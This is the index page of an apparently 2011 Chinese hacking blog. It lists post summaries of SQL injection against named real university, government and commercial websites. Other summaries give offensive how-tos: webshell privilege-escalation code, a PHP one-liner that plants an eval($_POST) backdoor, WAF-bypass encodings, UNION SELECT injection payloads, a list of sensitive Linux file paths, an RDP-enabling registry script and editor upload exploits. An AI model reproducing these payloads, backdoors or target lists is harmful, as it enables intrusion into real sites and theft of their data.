Swane's blog

游弋于黑白之间,但愿我未曾来过……

导航

2011年4月11日 #

gznc.edu.cn SQL injection

摘要: gznc.edu.cn SQL injection 阅读全文

posted @ 2011-04-11 01:28 无名组 阅读(6) 评论(0) 推荐(0) 编辑

2011年4月9日 #

无wscript.shell组件webshell提权的经验

摘要: 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。要想让运行命令可以试试这种方法,成功率为五五之数。把下面代码复制:<object runat=server id=oScriptlhn scope=page classid=\"clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8\"></object><%if err then%><object runat=server id=oScr 阅读全文

posted @ 2011-04-09 03:52 无名组 阅读(424) 评论(0) 推荐(0) 编辑

webshell 提权思路

摘要: 一:首先检测一下网站的服务器是否开了 3389 远程终端 二:检测一下服务是否用了serv-u (还有是什么版本的) 方法 一:复制一个网站 用 3389 登陆器连接一下 (是否成功) 能连接了,拿下服务器的机率,提高 30%了 二:用ftp模式查下一个服务器的版本 开始 -- 运行 -- cmd -- ftp (加你要登陆的网站) --------------------------------------------------------------------------------------- 第一步:最简单的方法 看有没有权限,能不能执行命令,行的话直接传个鸽子运行(成功率非常低 阅读全文

posted @ 2011-04-09 03:17 无名组 阅读(411) 评论(0) 推荐(0) 编辑

突破防注入,防注入程序拿shell

摘要: 当你用单引号“’”来测试一个网站可能存在注入漏洞的地址时(假设网址为“www.lvbaowang.com/news.asp?id=6”)弹出了“你的操作已被记录!”这类信息,而我们又没办法去绕过防注入系统的时候,可以试着提交http://www.lvbaowang.com/sqlin.asp看看存不存在“sqlin.asp” ,如果存在的话,我们只要提交<A href="http://www.lvbaowang.com/news.asp?id=6'http://www.lvbaowang.com/news.asp?id=6'<%execute reques 阅读全文

posted @ 2011-04-09 00:36 无名组 阅读(666) 评论(0) 推荐(0) 编辑

2011年4月8日 #

黑客人生

摘要: 曾记得,黑客的原意是指那些对计算机执著钻研,擅长研究系统缺陷的狂热者。但现在黑客的原意已被雨打风吹去,我们那一撮还死死抱着“自由,共享,交流,钻研”的朋友们,你们今天还好吗?当为着这些原生态的黑客精神而热泪盈眶时,当为理想信念而执着奋斗时,当梦想还在支撑着你寂寂默默的前行时,你是否有所察觉,美丽而纯粹的黑客世界在你身后将崩塌。不让生活磨灭我们的个性,是对自己精神价值的鼓舞,还是现实生活中苍白无奈的呐喊?当铅华荡尽,泡沫破灭,蓦然回首,你是否感叹在生命中曾经有过一段无悔的激情岁月…… 阅读全文

posted @ 2011-04-08 22:02 无名组 阅读(234) 评论(0) 推荐(0) 编辑

2011年4月6日 #

绕过防注入

摘要: 1、运用编码技术绕过如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。2、通过空格绕过如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or' swords' =‘swords',由于mssql的松散性,我们可以把or 'swords' 之间的空格去掉,并不影响运行。3、运用字符串判断代替用经典的or 1=1判断绕过,如or 'swords' ='swords', 阅读全文

posted @ 2011-04-06 23:29 无名组 阅读(185) 评论(0) 推荐(0) 编辑

2011年4月5日 #

ihm.gov.mo SQL injection

摘要: ihm.gov.mo SQL injection 阅读全文

posted @ 2011-04-05 03:11 无名组 阅读(12) 评论(0) 推荐(0) 编辑

一句php代码生成php一句话小马的后门

摘要: <?fputs(fopen(linuxso.php,w),<?eval($_POST[nst]);?>)?>这样访问之后,在当前目录生成linuxso.php 内容为 <?eval($_POST[nst]);?>)?> 的一句话小马,密码为:nst 阅读全文

posted @ 2011-04-05 01:54 无名组 阅读(1160) 评论(0) 推荐(0) 编辑

Linux下敏感文件收集

摘要: etc/httpd/conf/httpd.conf/etc/rc.local 有时可以读出来apache的路径/usr/local/apache/conf/httpd.conf/var/www/html/apache/conf/httpd.conf/home/httpd/conf/httpd.conf/usr/local/apache2/conf/httpd.conf/usr/local/httpd/conf/httpd.conf/etc/apache/httpd.conf/usr/local/lib/php.ini/etc/hosts.deny 定义禁止访问本机的主机/etc/bashr 阅读全文

posted @ 2011-04-05 01:24 无名组 阅读(1288) 评论(0) 推荐(0) 编辑

2011年4月4日 #

国外在线sql injection扫描

摘要: 国外在线sql injection扫描 阅读全文

posted @ 2011-04-04 21:14 无名组 阅读(2) 评论(0) 推荐(0) 编辑

超过10,000下载的bug和漏洞

摘要: 说明一下,这个是从一国外黑客论坛上弄到的有兴趣的朋友去研究下吧 阅读全文

posted @ 2011-04-04 21:03 无名组 阅读(121) 评论(0) 推荐(1) 编辑

neurology.ae SQL injection

摘要: neurology.ae SQL injection 阅读全文

posted @ 2011-04-04 20:58 无名组 阅读(9) 评论(0) 推荐(0) 编辑

for the domain country SQL injection web shell results

摘要: for the domain country SQL injection web shell results 阅读全文

posted @ 2011-04-04 16:54 无名组 阅读(13) 评论(0) 推荐(0) 编辑

prc.ac.th SQL injection

摘要: prc.ac.th SQL injection 阅读全文

posted @ 2011-04-04 16:13 无名组 阅读(8) 评论(0) 推荐(0) 编辑

2011年4月3日 #

欧派多站存在SQL注入漏洞

摘要: 欧派多站存在SQL注入漏洞 阅读全文

posted @ 2011-04-03 16:51 无名组 阅读(5) 评论(0) 推荐(0) 编辑

ncu.edu.tw SQL injection

摘要: ncu.edu.tw SQL injection 阅读全文

posted @ 2011-04-03 15:40 无名组 阅读(5) 评论(0) 推荐(0) 编辑

hbnu.edu.cn SQL injection

摘要: hbnu.edu.cn SQL injection 阅读全文

posted @ 2011-04-03 11:50 无名组 阅读(10) 评论(0) 推荐(0) 编辑

chd.edu.cn SQL injection

摘要: chd.edu.cn SQL injection 阅读全文

posted @ 2011-04-03 10:54 无名组 阅读(5) 评论(0) 推荐(0) 编辑

FCK编辑器漏洞

摘要: CKeditor漏洞多的要命,一堆堆的网站因为这种洞而牺牲了。 1. 查看编辑器版本 FCKeditor/_whatsnew.html ———————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破 测试通过。 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件将以下保存为html 文件修改action 地址Upload a new file:—————————————————————————————4 阅读全文

posted @ 2011-04-03 07:37 无名组 阅读(1183) 评论(0) 推荐(0) 编辑

tc.edu.tw SQL injection

摘要: tc.edu.tw SQL injection 阅读全文

posted @ 2011-04-03 05:41 无名组 阅读(6) 评论(0) 推荐(0) 编辑

xtu.edu.cn SQL injection

摘要: xtu.edu.cn SQL injection 阅读全文

posted @ 2011-04-03 03:45 无名组 阅读(11) 评论(0) 推荐(0) 编辑

tongji.edu.cn SQL injection

摘要: tongji.edu.cn SQL injection 阅读全文

posted @ 2011-04-03 02:40 无名组 阅读(5) 评论(0) 推荐(0) 编辑

cnu.edu.cn SQL injection

摘要: cnu.edu.cn SQL injection 阅读全文

posted @ 2011-04-03 01:46 无名组 阅读(5) 评论(0) 推荐(0) 编辑

2011年4月2日 #

nwu.edu.cn SQL injection

摘要: nwu.edu.cn SQL injection 阅读全文

posted @ 2011-04-02 23:49 无名组 阅读(10) 评论(0) 推荐(0) 编辑

注入天书

摘要: SQL 注入天书 - ASP 注入漏洞全接触收藏引言随着 B/S 模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的 SQL Injection,即SQL注入。 SQL注入是从正常的 WWW 端口访问,而且表面看起来跟一般的 Web 页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看 IIS 日志的习惯, 阅读全文

posted @ 2011-04-02 22:00 无名组 阅读(163) 评论(0) 推荐(0) 编辑

手工注入经验

摘要: 一、判断是否可以注入:1. 单引号但如果单引号测试出错,是可以试试and 1=1的,因为一些对SQL注入有一点了解的程序员认为只要把单引号过滤掉就可以了2. 传入参数为数字型时:and 1=1and 1=2可以注入的提示:BOF或EOF,程序未做任何判断提示找不到记录,判断了rs.eof显示内容为空,程序加了on error resume next不可注入的提示:类型转换时出错其他自定义的出错提示3. 传入参数不为数字型时,需要变动一下比如:asp?id=aeo' and '1'='1asp?id=aeo' and '1'='2二 阅读全文

posted @ 2011-04-02 21:58 无名组 阅读(467) 评论(0) 推荐(0) 编辑

ewebeditor高版本>=5.50day

摘要: 对6.X的也管用,对ASP。aspx。JSP。均管用。利用方法:先访问这个地址Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp访问这个地址可以建立个A.ASP的文件夹……再用这个html代码上传。html代码:<form action="http://www.xxx.com/Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=a.asp" method=po 阅读全文

posted @ 2011-04-02 21:56 无名组 阅读(153) 评论(0) 推荐(0) 编辑

PHP+MySQL 手工注入语句

摘要: 暴字段长度order by num/*匹配字段and 1=1 union select 1,2,3,4,5…….n/*暴字段位置and 1=2 union select 1,2,3,4,5…..n/*利用内置函数暴数据库信息version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用):and 1=2 union all select version() /*and 1=2 union all select database() /*and 1=2 union all select user() /*操作系统信息:and 1=2 union all se 阅读全文

posted @ 2011-04-02 21:53 无名组 阅读(164) 评论(0) 推荐(0) 编辑

php+mysql暴库语法

摘要: 1.判断版本http://www.xxx.xxx/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询2.猜解 字段数目,用order by也可以猜,也可以用union select一个一个的猜解http://www.xxx.xxx/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--3.查看数据库版本及当前用户,http://www.xxx.xxx/document 阅读全文

posted @ 2011-04-02 21:52 无名组 阅读(280) 评论(0) 推荐(0) 编辑

weldinfo.net SQL injection

摘要: weldinfo.net SQL injection 阅读全文

posted @ 2011-04-02 21:50 无名组 阅读(5) 评论(0) 推荐(0) 编辑

gz18school.com SQL injection

摘要: gz18school.com SQL injection 阅读全文

posted @ 2011-04-02 21:43 无名组 阅读(5) 评论(0) 推荐(0) 编辑

analchem.cn SQL injection

摘要: analchem.cn SQL injection 阅读全文

posted @ 2011-04-02 21:34 无名组 阅读(7) 评论(0) 推荐(0) 编辑

kjc.qau.edu.cn SQL injection

摘要: kjc.qau.edu.cn SQL injection 阅读全文

posted @ 2011-04-02 20:53 无名组 阅读(7) 评论(0) 推荐(0) 编辑

shmtu.edu.cn SQL injection

摘要: shmtu.edu.cn SQL injection 阅读全文

posted @ 2011-04-02 17:19 无名组 阅读(14) 评论(0) 推荐(0) 编辑

baihe.com SQL injection

摘要: baihe.com SQL injection 阅读全文

posted @ 2011-04-02 15:09 无名组 阅读(5) 评论(0) 推荐(0) 编辑

MYSQL高级注入实例

摘要: ############################################MYSQL高级注入实例###########################################-----------------------------------系统信息 -------------------------------------------http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5××××××× 阅读全文

posted @ 2011-04-02 13:38 无名组 阅读(196) 评论(0) 推荐(0) 编辑

MySQl注入笔记

摘要: 目标站点:http://www.babydaily.com.hk/注入点:http://www.babydaily.com.hk/newsDetail.php?id=53首先,获得信息,加一个单引号提交http://www.babydaily.com.hk/newsDetail.php?id=53’返回如下信息,You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\ 阅读全文

posted @ 2011-04-02 13:36 无名组 阅读(237) 评论(0) 推荐(0) 编辑

开启终端的简单方法

摘要: 今天介绍的这种开终端的方法,绿色,环保,无污染~~不须上传任何文件开启终端的方法适合win2k,xp,2003.本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~在无须传任何文件的情况下开启终端服务。一、win 2k下终端开启终端首先用ECHO写一个3389.reg文件,然后导入到注册表,echo代码如下:echo Windows Registry Editor Version 5.00 >>3389.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcac 阅读全文

posted @ 2011-04-02 13:30 无名组 阅读(406) 评论(0) 推荐(0) 编辑

总结几个搜索编辑器漏洞

摘要: site:editor inurl:asp?id inurl:ewebeditornet比如常见的编辑器漏洞有:ewebeditor ewebeditornet fckeditoreditor southidceditor SouthidcEditorbigcneditor一:ewebeditor为例1:默认下载下来的后台: http://www.test.com/ewebeditor/admin_login.asp后台如果能进入:可点击样式管理:standard 拷贝一份(直接修改改不了)在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览在编辑器里点设计 然后直接上传asa大 阅读全文

posted @ 2011-04-02 13:28 无名组 阅读(274) 评论(0) 推荐(0) 编辑

insert式注射攻击解析

摘要: 当碰到一些特殊的站时可以试着用insert注入(如:留言版神马的..前提是必须与数据库交互)首先我们先了解下insert的语法insert into table (column_name_1,column_name_2,column_n) vlaues (value_1,value_2,value_n)当value值数大于column时,数据库就会爆出错误于是当我们在网页中提交a’,null,null,null,null,null);– 如返回错误页面a’,null,null,null,null,null,null);– 如返回正常页面(至于过滤单引号的问题就不在本文讨论范围内了)说明当前表字 阅读全文

posted @ 2011-04-02 13:23 无名组 阅读(153) 评论(0) 推荐(0) 编辑